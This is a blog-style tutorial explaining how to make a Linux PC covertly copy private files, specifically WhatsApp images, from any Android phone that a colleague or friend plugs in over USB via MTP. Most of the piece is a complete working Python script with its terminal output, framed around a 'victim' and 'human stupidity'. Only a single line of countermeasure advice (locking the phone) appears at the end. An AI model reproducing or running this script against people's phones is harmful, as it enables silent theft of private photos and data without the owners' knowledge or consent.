How many times did your work colleague or a friend of yours find a USB cable from your PC/Laptop and attach his Android phone to recharge its battery? Have you ever thought that your private data (images, sounds, videos, text notes) may get transferred behind the scenes without you even noticing? If not, then after reading this article you will think twice before plugging your Android into another’s PC, even if they stepped away from their desks! In this article you will learn how to turn your Linux box into a fish net to grab any file from Android via USB cable and we will count on “no patch for human stupidity” to make it happen. For this demonstration I will be using Ubuntu 14.4 with Python 2.7. Fill out the form below to download the code associated with this article. [download] How it works Recent Android versions use MTP (Multimedia Transfer Protocol) and PTP (Picture Transfer Protocol) protocols for USB computer connections. PTP is usually used for PCs that don’t support MTP. MTP allows you to transfer media files in Windows, Linux and Mac (using Android File Transfer on Mac). The beauty of Linux that it can mount the Android device (or any MTP device) and treat it like any accessible directory/path. In order to mount an MTP device, you would need to have “mtp-tools” installed (it is by default on most Linux distributions ). Since Ubuntu 13.04 storage access to external devices via MTP is supposed to work out of the box via a GVFS-MTP module, if you are running an older version or another distribution, make sure to have the necessary tools with “sudo apt-get install mtp-tools mtpfs”. All right, when you plug in an Android device it will be listed under the USB list – here’s the output when I plug in my Samsung S4: hkhrais@Hkhrais:~$ lsusb | grep Sam Bus 002 Device 092: ID XXXX:YYYY Samsung Electronics Co., Ltd GT-I9100 Phone [Galaxy S II], GT-I9300 Phone [Galaxy S III], GT-P7500 [Galaxy Tab 10.1] Now the directory of mounted devices is located in /run/user/$USER/gvfs/ and is named after the protocol, connection type and address they use. Note that the connection address may change every time you replug the device. hkhrais@Hkhrais:/run/user/1000/gvfs$ ls mtp:host=%5Busb%3A002%2C027%5D Which is equivalent to Nautilus GUI view as mtp://[usb:002,027]
Having the device mounted, we should be able to browse it from the terminal like any internal directory on Linux. Moving forward and browsing the Phone memory … hkhrais@Hkhrais:~$ cd run/user/1000/gvfs/mtp:host=%5Busb%3A002%2C027%5D/Phone hkhrais@Hkhrais:/run/user/1000/gvfs/mtp:host=%5Busb%3A002%2C027%5D/Phone$ ls Alarms cred.conf OGQ SMemo Android DCIM Overslept Sounds AppDroid Monitor Documents Pictures Temp Application Download Playlists TouchScreenCounter AutoCam media Podcasts viber Bluetooth Movies quran_android wdh_update CallDropReason Music Ringtones WhatsApp com.facebook.katana Notifications sl4a hkhrais@Hkhrais:/run/user/1000/gvfs/mtp:host=%5Busb%3A002%2C027%5D/Phone/WhatsApp/Media$ ls WallPaper WhatsApp Images WhatsApp Video WhatsApp Audio WhatsApp Profile Photos WhatsApp Voice Notes Okay, at this point, each one may be interested in certain data to grab once the device is plugged in. The question is, how could we predict the file location/names/type on the victim phone? Here’s where MTP tools become in handy. We have a bunch of options to interact with the connected MTP device: hkhrais@Hkhrais:~$ mtp- mtp-albumart mtp-files mtp-hotplug mtp-sendtr mtp-albums mtp-filetree mtp-newfolder mtp-thumb mtp-connect mtp-folders mtp-newplaylist mtp-tracks mtp-delfile mtp-format mtp-playlists mtp-trexist mtp-detect mtp-getfile mtp-reset mtp-emptyfolders mtp-getplaylist mtp-sendfile The major options are: mtp-folders: Retrieves each directory in the MTP device with its ID (this ID would be the parent ID) – for example any file that has a parent ID of 3583 should belong to the Whatsapp images directory.
Mtp-files: Get each File ID and Parent ID on MTP So we can say the below image which has a name of “IMG-20140106-WA0000.jpg” with ID of “3635″ belongs to the WhatsApp folder because its parent ID is “3583″. File ID: 3635 Filename: IMG-20140106-WA0000.jpg File size 70052 (0x00000000000111A4) bytes Parent ID: 3583 Storage ID: 0x00010001 Filetype: JPEG file
mtp-getfile : Grab the file from MTP to PC.
Once we have the file ID in hand, we just need to pass this parameter to “mtp-getfile”, the command format would be:
mtp-getfile
Coding the fishnet The whole idea here is to write a simple Python script that will check /run/user/$USER/gvfs/ continuously and if it detects any entry, it will try to figure out the Whatsapp Imgs directory ID and starting copying images around! So let the game begin … Disclaimer : I’ve written some sections of the code in a way to torture script kiddies. import os import subprocess as sub import sys import time def main():
create a ‘dirty’ directory and check if MTP is plugged in
if not os.path.exists(“/home/hkhrais/Desktop/Phish”): os.makedirs(“/home/hkhrais/Desktop/Phish”) print “[+] Waiting MTP to connect…” while (True): try: device = os.listdir(“/run/user/1000/gvfs/”) if str(device[0]) != “”: print “[+] MTP device detected” break else: time.sleep(1) except: pass The code starts with creating a “dirty” directory where we will grab the folder/file/images from the victim mobile. Then it will check /run/user/$USER/gvfs/ to see if any MTP device is attached. If so, we will break the loop and move on to the next phase …
retrieve files and folders ID
try: f = open(“/home/hkhrais/Desktop/Phish/folders.txt”, “w”) p = sub.Popen(‘mtp-folders’,stderr=sub.PIPE,universal_newlines=True, stdout=f) output, errors = p.communicate() f = open(“/home/hkhrais/Desktop/Phish/files.txt”, “w”) p = sub.Popen(‘mtp-files’,stderr=sub.PIPE,universal_newlines=True, stdout=f) output, errors = p.communicate() except: print “[-] Unable to retrieve directories and files” raise Here we create two text files and direct the output of ‘mtp-folders’ , ‘mtp-files’ into them. Once we accomplish this step, we should have a hierarchical tree of all MTP folders/files .
Grab WhatsApp Images folder ID
f = open(“/home/hkhrais/Desktop/Phish/folders.txt”, “r”) for line in f.readlines(): if “WhatsApp Images” in line: break for id in line.split(): if id.isdigit(): break print “[+] WhatsApp is located on id: “+ id Remember, in order to know if a file (image, mp3, video) belongs to the WhatsApp folder, we first need to know the WhatsApp folder ID. The above part will scan the Folder.txt and search for the “WhatsApp Images” keyword in each line. Once we have it, it will save the Folder ID in a string called id.
Grab the first two images ID
f = open(“/home/hkhrais/Desktop/Phish/files.txt”, “r”) imgcount = 0 linenumb=0 num =[] for linenumb, line in enumerate(f, 1): if id in line: imgcount+=1 num.append(linenumb–1) if imgcount==2: break f = open(“/home/hkhrais/Desktop/Phish/files.txt”, “r”) lines=f.readlines() print “[+] 1’st Img has a “ + lines[num[0]-3] print “[+] 2’nd Img has a “ + lines[num[1]-3] At this point, we know the Folder ID, so we simply read the ‘files.txt’ and see check if we can find any entry which has a parent ID equal to the WhatsApp id (parent id). If so, then take the file ID of the first two entries and save them in a list called num. Keep in mind the format of the output file is like the screenshot below.
Get Images to Phish directory
os.chdir(“/home/hkhrais/Desktop/Phish/”) for firstid in lines[num[0]-3].split(): if firstid.isdigit(): break try: get = “mtp-getfile “ + firstid + ” “+firstid+“.JPEG” g = sub.Popen(str(get),shell=True,stdout=sub.PIPE, stderr=sub.PIPE) output, errors = g.communicate() except: print “[-] Unable to get fisrt img” raise for secondid in lines[num[1]-3].split(): if secondid.isdigit(): break try: get = “mtp-getfile “ + secondid + ” “+secondid+“.JPEG” g = sub.Popen(str(get),shell=True,stdout=sub.PIPE, stderr=sub.PIPE) output, errors = g.communicate() except: print “[-] Unable to get second img” raise print “[+] Done !” main() Last step – since we have the file ID, we are good to go and download the image from the Android. Running the script, we get the below result: hkhrais@Hkhrais:~/Desktop/Phishing Whatsapp$ python Phish.py [+] Waiting MTP to connect… [+] MTP device detected [+] WhatsApp is located on id: 3714 [+] 1’st Img has a File ID: 3769 [+] 2’nd Img has a File ID: 3770 [+] Done ! hkhrais@Hkhrais:~/Desktop/Phishing Whatsapp$
One point we should mention here, once the Android is connected, in the notification window, the victim should have MTP selected.
Countermeasures Before you attach your phone, make sure it’s locked (with pin or swipe pattern ), the phone won’t be accessible if it’s locked. Got any issues? Please post your question, it’s always nice to hear from you.